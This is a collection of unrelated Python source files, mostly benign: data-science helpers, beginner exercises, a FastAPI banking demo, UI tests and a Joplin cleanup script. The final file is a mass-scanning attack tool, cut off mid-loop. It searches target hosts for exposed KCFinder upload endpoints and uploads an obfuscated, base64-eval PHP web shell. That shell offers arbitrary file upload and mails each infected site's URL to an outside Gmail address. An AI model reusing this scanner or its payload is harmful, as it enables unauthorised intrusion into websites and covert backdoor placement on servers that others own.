            # y-domain: prediction inside the fold's training target range.
            y_ad.append((y_p >= model['y_min']) & (y_p <= model['y_max']))
            # x-domain: descriptors inside the training bounding box AND the generator's own AD.
            x_ad.append(((d_x.loc[:, self.__box] - model['x_min']).min(axis=1) >= 0) &
                        ((model['x_max'] - d_x.loc[:, self.__box]).min(axis=1) >= 0) & d_ad)
        out = dict(prediction=pd.concat(pred, axis=1),
                   domain=pd.concat(x_ad, axis=1), y_domain=pd.concat(y_ad, axis=1))
        if prob:
            out['probability'] = pd.concat(prob, axis=1, keys=range(len(prob)))
        if d_s is not None:
            out['structures'] = d_s
        return out
|
# http://www.practicepython.org/exercise/2014/07/14/19-decode-a-web-page-two.html
# Fetch a Vanity Fair article and print its title, subtitle and paragraphs.
from bs4 import BeautifulSoup
import requests

url = requests.get("http://www.vanityfair.com/style/society/2014/06/monica-lewinsky-humiliation-culture")
sopa = BeautifulSoup(url.text, "lxml")
titulo = sopa.find("h1")
subtitulo = titulo.find_next("span")
texto = sopa.find_all("p")
print(titulo.get_text())
print(subtitulo.get_text())
for parrafo in texto:
    try:
        # Only paragraphs with a small numeric data-reactid belong to the article body.
        if int(parrafo.attrs["data-reactid"]) < 457:
            print(parrafo.get_text())
    except (KeyError, ValueError):
        # Fixed: the original bare `except:` swallowed every exception
        # (including KeyboardInterrupt). Only skip paragraphs lacking a
        # numeric data-reactid attribute.
        pass
|
from ._uirevision import UirevisionValidator
from ._sector import SectorValidator
from ._radialaxis import RadialAxisValidator
from ._hole import HoleValidator
from ._gridshape import GridshapeValidator
from ._domain import DomainValidator
from ._bgcolor import BgcolorValidator
from ._barmode import BarmodeValidator
from ._bargap import BargapValidator
from ._angularaxis import AngularAxisValidator
|
# Word-wheel search: print every 4-letter combination (one letter per wheel)
# that appears in the English or Welsh reference word lists.
import io
import itertools

# Load each reference list once, as a set for O(1) membership tests.
with io.open('1000english.txt', 'r', encoding='utf8') as f:
    english_words = set(word.strip().lower() for word in f)
with io.open('1000welsh.txt', 'r', encoding='utf8') as g:
    welsh_words = set(word.strip().lower() for word in g)

def is_english_word(word):
    """Return True if *word* appears in the English word list."""
    return word.lower() in english_words

def is_welsh_word(word):
    """Return True if *word* appears in the Welsh word list."""
    return word.lower() in welsh_words

wheel1 = ('s', 't', 'd', 'm', 'r', 'f', 'b', 'l', 'p', 'w')
wheel2 = ('w', 'r', 'y', 'u', 'a', 'i', 'o', 'l', 'e', 'h')
wheel3 = ('r', 'm', 't', 'n', 's', 'k', 'o', 'a', 'l', 'e')
wheel4 = ('g', 'k', 'm', 's', 't', 'e', 'p', 'y', 'l', 'd')

# itertools.product iterates in the same order as the original four nested
# loops (last wheel varies fastest), so output lines and indices are unchanged.
for i, letters in enumerate(itertools.product(wheel1, wheel2, wheel3, wheel4)):
    testword = ''.join(letters)
    if is_english_word(testword) or is_welsh_word(testword):
        print(i, testword)
|
"""
7. Faça um Programa que calcule a área de um quadrado, em seguida mostre o dobro desta área para o usuário.
"""
lado_quadrado = float(input("Digite o comprimento de um lado do quadrado: "))
area_quadrado = lado_quadrado * 2
dobro_area = 2 * area_quadrado
print(f"A área do quadrado é igual a {area_quadrado}m2 e o dobro desta área é igual a {dobro_area}") |
# Demo: read an integer from the user and pass it to num() from the project
# module FunctionsForModuleCreations2 (its semantics are defined there).
import FunctionsForModuleCreations2

number = int(input("enter a number = "))
# NOTE(review): the surrounding parentheses are redundant and any return
# value of num() is discarded.
(FunctionsForModuleCreations2.num(number))
# Demo of dict literals, mutation, and nested containers (sets inside dicts).
dictionary = {
    '1' : 'One',
    '2' : 'Two',
    '4' : 'Four',
    '5' : 'Five',
    '6' : 'Six',
    '7' : 'Seven',
    '8' : 'Eight',
}
# NOTE(review): this key is the int 9 while the keys above are strings, so
# dictionary['9'] and dictionary[9] would be distinct entries — confirm intended.
dictionary[9] = ['soda', 'loli']
# print(dictionary)
zx = {
    1 : {'we', 'are', 'great'},
    2 : {'we', 'are', 'great'}
}
# print(zx)
# print(type(zx))
# TABLE for a single number
def table_1():
    """Print the multiplication table of 9 for factors 1 through 10."""
    base = 9
    for factor in range(1, 11):
        print(base, 'x', factor, '=', base * factor)
# table_1()
# Output_1 =
# 9 x 1 = 9
# 9 x 2 = 18
# 9 x 3 = 27
# 9 x 4 = 36
# 9 x 5 = 45
# 9 x 6 = 54
# 9 x 7 = 63
# 9 x 8 = 72
# 9 x 9 = 81
# 9 x 10 = 90
# Table for multiple numeber
def table_2():
    """Print multiplication tables for 1..12, each with factors 1..10."""
    base_val = range(1,13)
    sc_num = range(1,11)
    table_title = 1
    for fst_c in base_val:
        print('_____''Table of - ', table_title,'_____')
        table_title += 1
        for scnd_c in sc_num:
            cal = fst_c * scnd_c
            print(fst_c, 'x' , scnd_c, '=', cal)
        else:
            # for/else with no break: the else always runs after the inner
            # loop, printing a separator under every table.
            # NOTE(review): indentation was ambiguous in the source; assumed
            # the else belongs to the inner loop — confirm intended output.
            print('_____________________________')
# table_2()
# table_2() |
# libraries
import pickle
import numpy as np
import pandas as pd
import fbprophet as prop
from keras.models import load_model
def predict_arima(trained_model, predict_type, n_periods, df_train=None, df_test=None):
    """Predict with a pickled ARIMA-style model.

    trained_model: path to a pickled fitted model exposing fit()/predict().
    predict_type: 'once' for a single multi-step forecast, 'sequential' for
        one-step-ahead forecasts where the training window grows by one
        observed test row after each step.
    n_periods: forecast horizon for the 'once' mode.
    df_train / df_test: pandas frames, required for 'sequential' mode.
    Returns the model's forecast; in sequential mode a numpy array of
    shape (len(df_test), 1).
    """
    assert predict_type in ('once', 'sequential')
    # load the trained model
    with open(trained_model, 'rb') as pkl:
        model = pickle.load(pkl)
    # BUG FIX: the original used `predict_type is 'once'`, comparing string
    # identity rather than equality — equal strings are not guaranteed to be
    # the same object, so the branch could silently misfire.
    if predict_type == 'once':
        pred = model.predict(n_periods=n_periods)
    else:
        n_tot = df_test.shape[0]
        df_train_new = df_train.copy()
        pred = []
        for i in range(n_tot):
            # Refit on the growing window, then forecast a single step ahead.
            model = model.fit(df_train_new)
            pred.append(model.predict(n_periods=1)[0])
            # update df_train with the observed test row
            df_train_new = pd.concat([df_train_new, df_test.iloc[[i]]])
        pred = np.array(pred)
        pred = pred.reshape((pred.shape[0], 1))
    return pred
def predict_prophet(trained_model, n_periods):
    """Forecast *n_periods* ahead with a pickled Prophet model."""
    # NOTE: prophet does not obtain sequential predictions. If train data is updated, a new model has to be fitted
    # Deserialize the fitted model from disk.
    with open(trained_model, 'rb') as fh:
        fitted = pickle.load(fh)
    # Build the horizon dataframe and run the forecast in one pass.
    future_frame = fitted.make_future_dataframe(periods=n_periods)
    return fitted.predict(future_frame)
def predict_lstm(trained_model, dat):
    """Run a saved Keras model on *dat* and return its predictions."""
    # Restore the serialized network, then apply it to the input batch.
    lstm = load_model(trained_model)
    return lstm.predict(dat)
|
class Movie(object):
    """
    A movie object stores a movie's title, genres, and description.
    Equality and hashing are based on the title only.
    """

    def __init__(self, title, genres, description):
        """
        Initializes a Movie object.
        title: string, movie's title
        genres: list of strings, movie's genres
        description: string, movie's description
        """
        self.title = title
        self.genres = genres
        self.description = description

    def __eq__(self, other):
        """
        Checks if one Movie object is equal to another based on the movie's title.
        BUG FIX: the original tested isinstance(self, other.__class__), which
        raised AttributeError when `other` was an arbitrary object (e.g.
        object()) because other.get_title() does not exist. Checking that
        `other` is a Movie is safe for any right-hand operand.
        return: boolean
        """
        if isinstance(other, Movie):
            return self.title == other.get_title()
        return False

    def __hash__(self):
        """
        Creates a hash value for the Movie object based on the movie's title.
        Consistent with __eq__ (equal titles hash equally).
        return: int, hash value
        """
        return hash(self.title)

    def get_title(self):
        """
        return: string, the movie's title
        """
        return self.title

    def get_genre(self):
        """
        return: a list of strings, movie's genres
        """
        return self.genres

    def get_description(self):
        """
        return: string, the movie's description
        """
        return self.description

    def __str__(self):
        """
        Creates a new div element for the movie.
        return: string, a div element that will be used to display the movie
        """
        div = ("<div class='movie'>"+
               "<div class='title'>" + self.title + "</div>" +
               "<div class='genres'>" + ' '.join(map(str, self.genres)) + "</div>" +
               "<div class='description'>" + self.description + "</div>" +
               "</div> <hr/>")
        return div
|
# Copyright 2021-2022 NVIDIA Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import random
import numpy
import pytest
import cunumeric
# Code written using the NumPy interface
def step1(np, n):
    """Return two length-*n* all-ones vectors built with the supplied array module."""
    first = np.ones(n)
    second = np.ones(n)
    return first, second
def step2(np, x, y):
    """Dot product of *x* and *y* computed via the supplied array module."""
    result = np.dot(x, y)
    return result
def test_interop():
    """Mix numpy and cunumeric randomly across pipeline steps to check interop."""
    # Malicious adoption strategy
    numpy_likes = [numpy, cunumeric]
    # FIX: the original loop used `x` as its counter and then immediately
    # shadowed it with `x, y = step1(...)`, which was confusing; the counter
    # is unused, so name it `_`.
    for _ in range(10):
        x, y = step1(random.choice(numpy_likes), 1000000)
        step2(random.choice(numpy_likes), x, y)
if __name__ == "__main__":
import sys
sys.exit(pytest.main(sys.argv))
|
#importamos todas las clases y funciones de las otras carpetas
from db.user_db import UserInDB
from db.user_db import update_user, get_user
from db.transaction_db import TransactionInDB
from db.transaction_db import save_transaction
from models.user_models import UserIn, UserOut
from models.transaction_models import TransactionIn, TransactionOut
#importamos las librerias que vamos a usar
import datetime
from fastapi import FastAPI
from fastapi import HTTPException # retorna los errores con los codigos de status
api = FastAPI()#creamos la aplicacion -> RESTAPI
################## funcionalidad ################}
# Authentication functionality
@api.post("/user/auth/")  # this handler runs for POST /user/auth/
async def auth_user(user_in: UserIn):
    """Authenticate a user: check the username exists and the password matches.

    Returns {"Autenticado": bool}; raises HTTP 404 when the user is unknown.
    """
    user_in_db = get_user(user_in.username)  # look the user up by name
    # Fixed idiom: compare against None with `is`, not `==` (PEP 8).
    if user_in_db is None:
        raise HTTPException(status_code=404, detail="El usuario no existe")
    # NOTE(review): passwords are compared in plain text here — consider hashing.
    if user_in_db.password != user_in.password:
        return {"Autenticado": False}
    return {"Autenticado": True}
# Balance functionality
@api.get("/user/balance/{username}")  # username is taken from the URL path
async def get_balance(username: str):
    """Return the user's public data (username and balance) as a UserOut.

    Raises HTTP 404 when the username is unknown.
    """
    user_in_db = get_user(username)
    # Fixed idiom: compare against None with `is`, not `==` (PEP 8).
    if user_in_db is None:
        raise HTTPException(status_code=404, detail="El usuario no existe")
    # UserOut keeps only the public fields; ** maps the needed keys out of
    # the model's dict() representation.
    user_out = UserOut(**user_in_db.dict())
    return user_out
# Transaction functionality
@api.put("/user/transaction/")
async def make_transaction(transaction_in: TransactionIn):
    """Withdraw transaction_in.value from the user's balance and record it.

    Raises HTTP 404 for an unknown user and HTTP 400 for insufficient funds.
    Returns the stored transaction as a TransactionOut.
    """
    user_in_db = get_user(transaction_in.username)  # validate the user exists
    # Fixed idiom: compare against None with `is`, not `==` (PEP 8).
    if user_in_db is None:
        raise HTTPException(status_code=404, detail="El usuario no existe")
    if user_in_db.balance < transaction_in.value:  # validate available funds
        raise HTTPException(status_code=400, detail="Sin fondos suficientes")
    # Everything validated: debit the account and persist the new balance.
    user_in_db.balance = user_in_db.balance - transaction_in.value
    update_user(user_in_db)
    # Record the transaction together with the balance at that moment.
    transaction_in_db = TransactionInDB(**transaction_in.dict(),
                                        actual_balance=user_in_db.balance)
    transaction_in_db = save_transaction(transaction_in_db)
    transaction_out = TransactionOut(**transaction_in_db.dict())
    return transaction_out
|
from utils.function.setup import *
from utils.lib.user_data import *
from main.activity.desktop_v3.activity_login import *
from main.activity.desktop_v3.activity_logout import *
from main.activity.desktop_v3.activity_user_settings import *
import unittest
class TestProfile(unittest.TestCase):
    """UI tests for the user-settings page: edit profile, password and picture.

    Each test logs user8 in, performs one settings action, and logs out.
    The login/logout scaffold shared by all three tests lives in
    _run_settings_case (the original duplicated it verbatim per test).
    """

    # Target environment
    _site = "beta"

    def setUp(self):
        # Fresh browser session per test. (The original also created an
        # unused `test_driver` local, removed here.)
        self.driver = tsetup("chrome")
        self.flag = 0

    def _run_settings_case(self, banner, action):
        """Print the banner, log in as user8, run *action*, then log out."""
        line = "> ::%s::" % banner
        print(line)
        print("=" * len(line))  # underline matches the banner width
        driver = self.driver
        self.user = user8
        email = self.user['email']
        pwd = self.user['password']
        # Activity objects
        loginValidate = loginActivity()
        logoutValidate = logoutActivity()
        settings = settingProfileActivity()
        # --
        loginValidate.do_login(driver, self.user, email, pwd, self._site)
        action(settings, driver, pwd)
        logoutValidate.do_logout(driver, self._site)

    def test_edit_profile(self):
        self._run_settings_case(
            "TEST EDIT PROFILE",
            lambda s, d, pwd: s.profile_data(d, "input hobby here", "input messenger here", pwd))

    def test_edit_password(self):
        self._run_settings_case(
            "TEST EDIT PASSWORD",
            lambda s, d, pwd: s.profile_password(d, pwd, "123456789"))

    def test_edit_picture(self):
        self._run_settings_case(
            "TEST EDIT PICTURE",
            lambda s, d, pwd: s.profile_picture(d))

    def tearDown(self):
        print("> ::Testing has done, the browser window will be closed soon::")
        self.driver.quit()
# Run the suite directly; warnings emitted during the run are suppressed.
if __name__ == '__main__':
    unittest.main(warnings='ignore')
from urllib import request
import tarfile
import argparse
import json
from pathlib import Path
JOPLIN_PORT_RANGE = (41184, 41194)
JOPLIN_PING_RESPONSE = "JoplinClipperServer"
JOPLIN_RESOURCES_PATH = "resources/"
JOPLIN_RESOURCE_ID_LEN = 32
def get_joplin_port():
    """Probe the Joplin Web Clipper port range for the live service.

    Returns the first port whose /ping endpoint answers 200 with the
    expected body, or None when no port in the range responds.
    """
    for port in range(*JOPLIN_PORT_RANGE):
        print("trying port", port, end=" ")
        req = request.Request(f"http://localhost:{port}/ping")
        try:
            with request.urlopen(req) as f:
                print(f.status, f.reason, end=" ")
                if f.status == 200 and f.read().decode("utf-8") == JOPLIN_PING_RESPONSE:
                    print("port find!")
                    return port
        except Exception:
            # Any connection failure just means this is not Joplin's port;
            # deliberately best-effort. (Removed the unused `as e` binding.)
            print("not the port, skipping")
    print("port not found")
    return None
def auth(port, provided_token = None):
    """Obtain a Joplin API token.

    Resolution order: an explicitly provided token, then a cached
    ".joplin_token" file, then an interactive request against Joplin's
    /auth endpoint (the user must grant access in the Joplin app).
    Returns the token string; implicitly returns None if any HTTP status
    check on the request path fails.
    NOTE(review): nesting below was reconstructed from de-indented source —
    confirm the happy path matches the original.
    """
    if provided_token is not None:
        print("using provided token")
        return provided_token
    if Path(".joplin_token").exists():
        # Reuse the token cached by a previous run.
        with open(".joplin_token","r",encoding="utf8") as f:
            resp = json.load(f)
            print("loading token from file")
            return resp["token"]
    print("no existing token found, requesting")
    req = request.Request(f"http://localhost:{port}/auth")
    # POST (data=b"") starts the token-granting flow in the Joplin app.
    with request.urlopen(req, data=b"") as f:
        print(f.status, f.reason)
        if f.status == 200:
            resp = json.loads(f.read().decode("utf-8"))
            print("Token requested. Please check the joplin app to grant access.")
            input("Press enter after granting access.")
            token = resp["auth_token"]
            # Verify the grant via the auth/check endpoint.
            req = request.Request(f"http://localhost:{port}/auth/check?auth_token={token}")
            with request.urlopen(req) as f:
                print(f.status, f.reason)
                if f.status == 200:
                    resp = json.loads(f.read().decode("utf-8"))
                    print(resp)
                    if resp["status"] == "accepted":
                        print("auth success!")
                        # Cache the token for subsequent runs.
                        with open(".joplin_token","w",encoding="utf8") as f:
                            print("saving token to file")
                            json.dump(resp, f)
                        return resp["token"]
def get_joplin_resources(port, token, limit):
    """Fetch all resource (attachment) records from Joplin, page by page.

    limit: page size; None or values outside (0, 100] fall back to 50.
    Returns a list of resource dicts (each with at least 'id' and 'title').
    """
    has_more = True
    resources = []
    page = 1
    # set default page size when missing or out of range.
    # BUG FIX: the original wrote `not 0 < limit and limit <= 100`, which
    # parses as `(not (0 < limit)) and (limit <= 100)` — so an out-of-range
    # value such as 500 was NOT reset. The chained comparison must be
    # negated as a whole.
    if limit is None or not 0 < limit <= 100:
        limit = 50
    while has_more:
        print(f"requesting page {page}...", end=" ")
        req = request.Request(f"http://localhost:{port}/resources?token={token}&limit={limit}&page={page}")
        with request.urlopen(req) as f:
            print(f.status, f.reason, end=" ")
            if f.status == 200:
                resp = json.loads(f.read().decode("utf-8"))
                # print(resp)
                resources += resp["items"]
                has_more = resp["has_more"]
                page += 1
                print(f"got {len(resp['items'])}, total {len(resources)}, has_more {has_more}")
    return resources
def read_jex_resources(jex_path):
    """Collect the resource ids referenced inside a Joplin JEX (tar) export."""
    with tarfile.open(jex_path, "r") as archive:
        members = archive.getmembers()
    ids = []
    for member in members:
        # Only entries under the resources/ prefix are attachments; the id is
        # the fixed-length prefix of the remaining name.
        if member.name.startswith(JOPLIN_RESOURCES_PATH):
            stripped = member.name.replace(JOPLIN_RESOURCES_PATH, "")
            ids.append(stripped[:JOPLIN_RESOURCE_ID_LEN])
    return ids
def diff(referred, all):
    """Return ids present in *all* but missing from *referred* (orphans).

    referred: iterable of resource ids found in the JEX export.
    all: list of resource dicts with 'id' and 'title' keys.
    Raises Exception when *referred* is not a subset of the known ids.
    NOTE(review): the parameter name `all` shadows the builtin; kept
    unchanged for caller compatibility.
    """
    all_id_to_title_dict = {item["id"]: item["title"] for item in all}
    referred_set = set(referred)
    all_set = set(all_id_to_title_dict.keys())
    # Sanity check: every referred id must be a known attachment id.
    if not referred_set.issubset(all_set):
        raise Exception("Sanity check failed: referred ids is not a subset of all attachment ids!")
    # Fixed: all_set is already a set; the original wrapped it in set() again.
    not_referred = all_set.difference(referred_set)
    print("orphaned count:", len(not_referred))
    print("")
    print("id - filename")
    print("--------------------------------------")
    for id in not_referred:
        print(f"{id} - {all_id_to_title_dict[id]}")
    print("--------------------------------------")
    print()
    return not_referred
def do_delete(not_referred, port,token):
    """Delete each orphaned resource id via the Joplin REST API.

    Prints per-deletion progress; raises on a non-200 reply.
    """
    not_referred_len = len(not_referred)
    for idx, id in enumerate(not_referred):
        print(f"deleting {idx+1} of {not_referred_len}, id={id}", end=" ")
        req = request.Request(f"http://localhost:{port}/resources/{id}?token={token}", method="DELETE")
        with request.urlopen(req) as f:
            print(f.status, f.reason, end=" ")
            if f.status == 200:
                print("deleted")
            else:
                # NOTE(review): urlopen raises HTTPError for non-2xx replies,
                # so this branch is likely unreachable in practice.
                raise Exception("deletion failed, exiting...")
def main(args):
    """Top-level flow: connect, authenticate, diff JEX vs live resources, delete.

    args: argparse namespace (jex_path, port, token, limit, confirm, test_del_1).
    """
    port = args.port
    if not port:
        # Auto-detect the port when none was given on the command line.
        port = get_joplin_port()
        if port is None:
            raise Exception("failed to connect to joplin port...")
    token = args.token
    if not token:
        token = auth(port)
        if token is None:
            raise Exception("failed to obtain joplin API token...")
    referred = read_jex_resources(args.jex_path)
    # NOTE(review): `all` shadows the builtin here (matches diff()'s parameter).
    all = get_joplin_resources(port, token, limit=args.limit)
    print(f"referred: {len(referred)}, all {len(all)}")
    not_referred = diff(referred, all)
    if len(not_referred) == 0:
        print("No need to vacuum.")
        return
    if not args.confirm:
        # Dry-run by default: deletion requires an explicit --confirm flag.
        print('Confirm flag (--confirm) not set. Exiting without any deletion.')
        return
    if args.test_del_1:
        # Test mode: delete only a single orphan.
        to_be_removed = [list(not_referred)[0]]
    else:
        to_be_removed = list(not_referred)
    do_delete(to_be_removed, port, token)
    print("Done.")
if __name__ == "__main__":
description = """
Joplin Vacuum Cleaner
Removes attachments that are not referred.
!!! Always backup before using this tool and use at your own risk. !!!
Before using the script, you need to export your notes as a JEX file (Joplin Export File). The process of exporting
notes checks the reference of attachments, and attachments that are no longer referenced is not exported. The script
works out attachments not referred by calculating attachment ids that appears in Joplin Note Attachment Panel but
not in the exported file.
By default, only a list of not referred attachments are generated (i.e. dryrun). No deletion will take place unless
"confirm" flag is set ("--confirm").
For the first run, the script will request an API token from Joplin. The token will be store in the ".joplin_token"
file under the same directory as the script. Subsequent requests will reuse the token.
"""
parser = argparse.ArgumentParser(description=description, formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument("jex_path", type=str, help="Path to the JEX file")
parser.add_argument("--port", type=int, default=None, help="the port used to connect to Joplin, leave blank for auto query")
parser.add_argument("--token", type=str, default=None, help="override API token")
parser.add_argument("--limit", type=int, default=50, help="pagenation limit for querying attachments from Joplin")
parser.add_argument("--confirm", action='store_true', help="Confirm deletion")
parser.add_argument("--test-del-1",action='store_true', help="(For testing purpose) Removing one not referred attachment. Need to be used with confirm.")
args = parser.parse_args()
main(args)
|
#!/usr/bin/env python3
"""Fit the Lotka-Volterra with prey density dependence rR(1 - R/K), plot and save population dynamics between consumer and resource with input from command line"""
__appname__ = '[LV3.py]'
__author__ = 'Zongyi Hu (zh2720@ic.ac.uk)'
__version__ = '0.0.1'
# import packages
import scipy as sc
import numpy as np
import scipy.integrate as integrate
import matplotlib.pylab as p
import sys
# define a function that returns the growth rate of consumer and resource population at any given time step
def dCR_dt(pops):
    """Discrete Lotka-Volterra step with prey density dependence.

    pops: sequence [R, C] of resource and consumer densities.
    Uses the module-level parameters r, K, a, z, e set in main().
    Returns np.array([R_next, C_next]).
    """
    resource, consumer = pops[0], pops[1]
    next_resource = resource * (1 + r * (1 - resource / K) - a * consumer)
    next_consumer = consumer * (1 - z + e * a * resource)
    return np.array([next_resource, next_consumer])
def plot1(pops, t):
    """Plot resource and consumer densities against time; save as a PDF."""
    fig = p.figure()
    # Resource in green, consumer in blue, sharing the time axis.
    p.plot(t, pops[:, 0], 'g-', label='Resource density')
    p.plot(t, pops[:, 1], 'b-', label='Consumer density')
    p.grid()
    p.legend(loc='best')
    p.xlabel('Time')
    p.ylabel('Population density')
    p.title('Consumer-Resource population dynamics')
    # Persist the figure alongside the other results.
    fig.savefig('../results/LV3_model.pdf')
def plot2(pops):
    """Phase plot: consumer density as a function of resource density; save as a PDF."""
    fig = p.figure()
    # Single red trajectory through (resource, consumer) space.
    p.plot(pops[:, 0], pops[:, 1], 'r-')
    p.grid()
    p.xlabel('Resource density')
    p.ylabel('Consumer density')
    p.title('Consumer-Resource population dynamics')
    # Persist the figure alongside the other results.
    fig.savefig('../results/LV3_model1.pdf')
def main(argv):
    """main function of the program"""
    # Model parameters are hard-coded below. (The original comment claimed
    # they were read from the command line, but argv is never parsed.)
    global r, a, z, e, K
    r = 0.05
    a = 0.05
    z = 0.05
    e = 0.02
    # define K (carrying capacity of the resource)
    K = 10000
    # set the initial conditions for the two populations, convert the two into an array
    R0 = 10
    C0 = 5
    RC0 = np.array([R0, C0])
    # define population density array
    pops = np.array([[R0, C0]])
    # define starting point of time
    t = 0
    # creat 1000 density data of each population
    while t < 999:
        RC0 = dCR_dt(RC0)
        pops = np.append(pops, [[RC0[0], RC0[1]]], axis = 0)
        t = t + 1
    # define total t series
    t = np.array(range(1000))
    # plot population dynamic of consumer and resource and save pictures
    plot1(pops, t)
    plot2(pops)
    # Implicitly returns None, which sys.exit() treats as success.
if __name__ == "__main__":
"""Makes sure the "main" function is called from the command line"""
status = main(sys.argv)
sys.exit(status)
|
import requests
from os import system,chdir,mkdir
from time import sleep
import concurrent.futures
system('clear')
la7mar = '\033[91m'
la5dhar = '\033[92m'
labyadh = '\033[00m'
green = "\033[0;32m"
red = '\033[31m'
g = '\033[32m'
y = '\033[33m'
b = '\033[34m'
m = '\033[35m'
c = '\033[36m'
w = '\033[37m'
auth = """{} MCA-BD Kcfinder Scanner & AutoShell{}
____ _ _ _____ _ _ _
| _ \| | | | | __ \| | (_) | |
| |_) | | __ _ ___| | __ | |__) | |__ _ ___| |__
| _ <| |/ _` |/ __| |/ / | ___/| '_ \| / __| '_ \
| |_) | | (_| | (__| < | | | | | | \__ \ | | |
|____/|_|\__,_|\___|_|\_\ |_| |_| |_|_|___/_| |_|
______
|______|
Version: 1.0.0
{} We Don’t Responsible For Any illegal Activists {}
""".format(la7mar,green,la7mar,green)
print(auth)
target = ["kcfinder/","assets/ckeditor/kcfinder/","assets/libs/kcfinder/","panel/kcfinder/","assets/plugins/ckeditor/kcfinder/","admin/ckeditor/kcfinder/","libraries/jscripts/kcfinder/","ckeditor/kcfinder/","js/ckeditor/kcfinder","scripts/jquery/kcfinder/","kcfinder-2.51/","assets/js/mylibs/kcfinder/"]
kcfile = """
<title>Vuln!! patch it Now!</title>
<?php
/*
if You Decode This, Congratulations You Are 1337
Encoded By Black_Phish
*/
eval("?>".base64_decode("PD9waHAKc2V0X3RpbWVfbGltaXQoMCk7CmVycm9yX3JlcG9ydGluZygwKTsKc2Vzc2lvbl9zdGFy
dCgpOwplY2hvIGJhc2U2NF9kZWNvZGUoIlBDRkVUME5VV1ZCRklHaDBiV3crQ2p4b2RHMXNQZ284
YUdWaFpENEtJQ0E4ZEdsMGJHVStWWEJzYjJGa0lIbHZkWElnWm1sc1pYTTgKTDNScGRHeGxQZ284
TDJobFlXUStDanhpYjJSNVBnb2dJRHhtYjNKdElHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1i
M0p0TFdSaApkR0VpSUdGamRHbHZiajBpSWlCdFpYUm9iMlE5SWxCUFUxUWlQZ29nSUNBZ1BIQStW
WEJzYjJGa0lIbHZkWElnWm1sc1pUd3ZjRDRLCklDQWdJRHhwYm5CMWRDQjBlWEJsUFNKbWFXeGxJ
aUJ1WVcxbFBTSjFjR3h2WVdSbFpGOW1hV3hsSWo0OEwybHVjSFYwUGp4aWNpQXYKUGdvZ0lDQWdQ
R2x1Y0hWMElIUjVjR1U5SW5OMVltMXBkQ0lnZG1Gc2RXVTlJbFZ3Ykc5aFpDSStQQzlwYm5CMWRE
NEtJQ0E4TDJadgpjbTArQ2p3dlltOWtlVDRLUEM5b2RHMXNQZz09Iik7Cj8+"));eval("?>".base64_decode("PD9waHAKCWZ1bmN0aW9uIFhrQWtha0FqVEhzanNhakFqcygkY29kZSl7CgkkY29kZSA9IHN0cl9z
cGxpdCgkY29kZSw1KTsKCSRpID0gMDsKCWZvcmVhY2goJGNvZGUgYXMgJHgpewoJJHggPSBzdHJf
cm90MTMoJHgpOwoJICRibGFja1skaV09ICR4OwoJJGkrKzsKCX0KCSRieXRlcyA9IGh0bWxzcGVj
aWFsY2hhcnNfZGVjb2RlKGJhc2U2NF9kZWNvZGUoc3RyX3JvdDEzKGltcGxvZGUoJGJsYWNrKSkp
KTsKCWV2YWwoJz8+Jy4kYnl0ZXMpOwoJfQogPz4="));$coded = file(__FILE__);eval("?>".base64_decode("PD9waHAKZnVuY3Rpb24gZml4KCR4KXsKICR4ID0gc3RyX3JlcGxhY2UoIl9faGFsdF9jb21waWxl
cigpOyIsIiIsJHgpOwogcmV0dXJuICR4Owp9CiRYbSA9IGZpeCgkY29kZWRbY291bnQoJGNvZGVk
KS0xXSk7ClhrQWtha0FqVEhzanNhakFqcygkWG0pOwo/Pg=="));
__halt_compiler();Jmx0Oz9QSFANCiAgaWYoIWVtcHR5KCRfRklMRVNbJ3VwbG9hZGVkX2ZpbGUnXSkpDQogIHsNCiAgICAkcGF0aCA9ICZxdW90Oy4vJnF1b3Q7Ow0KICAgICRwYXRoID0gJHBhdGggLiBiYXNlbmFtZSggJF9GSUxFU1sndXBsb2FkZWRfZmlsZSddWyduYW1lJ10pOw0KICAgIGlmKG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWyd1cGxvYWRlZF9maWxlJ11bJ3RtcF9uYW1lJ10sICRwYXRoKSkgew0KICAgICAgZWNobyAmcXVvdDtUaGUgZmlsZSAmcXVvdDsuICBiYXNlbmFtZSggJF9GSUxFU1sndXBsb2FkZWRfZmlsZSddWyduYW1lJ10pLiANCiAgICAgICZxdW90OyBoYXMgYmVlbiB1cGxvYWRlZCZxdW90OzsNCiAgICB9IGVsc2V7DQogICAgICAgIGVjaG8gJnF1b3Q7VGhlcmUgd2FzIGFuIGVycm9yIHVwbG9hZGluZyB0aGUgZmlsZSwgcGxlYXNlIHRyeSBhZ2FpbiEmcXVvdDs7DQogICAgfQ0KICB9DQogLy9DaGFuZ2UgIFlvdXIgTWFpbA0KIA0KIGlmKCFpc3NldCgkX1NFU1NJT05bJnF1b3Q7dmlzaXQmcXVvdDtdKSl7DQokdXJsID0gICZxdW90O2h0dHA6Ly8mcXVvdDsuICRfU0VSVkVSWydIVFRQX0hPU1QnXS4gJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ107DQokaGVhZGVycyA9ICZxdW90O0Zyb206IHdlYm1hc3RlckBleGFtcGxlLmNvbSZxdW90OzsNCm1haWwoJ3JtMjE3NDcxNEBnbWFpbC5jb20nLCdXb3JkcHJlc3MgTGluayBHZW5lcmF0ZScsJHVybCwkaGVhZGVycyk7DQp9DQokX1NFU1NJT05bJnF1b3Q7dmlzaXQmcXVvdDtdID0gJnF1b3Q7b2smcXVvdDs7DQo
"""
files = {'file': ('blackphish.php5', kcfile.encode('utf-8'))}
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
def scan(x):
st = x.strip()
for dork in target:
link = "http://"+st+"/"+dork
try:
r = requests.get(link+"browse.php",timeout=10,headers=headers)
ripon = r.text
if "<title>KCFinder: /files</title>" in ripon or "kc_CKEditor" in ripon or "kcact:upload" in ripon:
sent = "https://"+st+"/"+dork+"upload.php"
try:
requests.post(sent,files=files,timeout=10,headers=headers)
lib = requests.get(link+"upload/files/blackphish.php5",timeout=10,headers=headers)
if "Vuln!!" in lib.text:
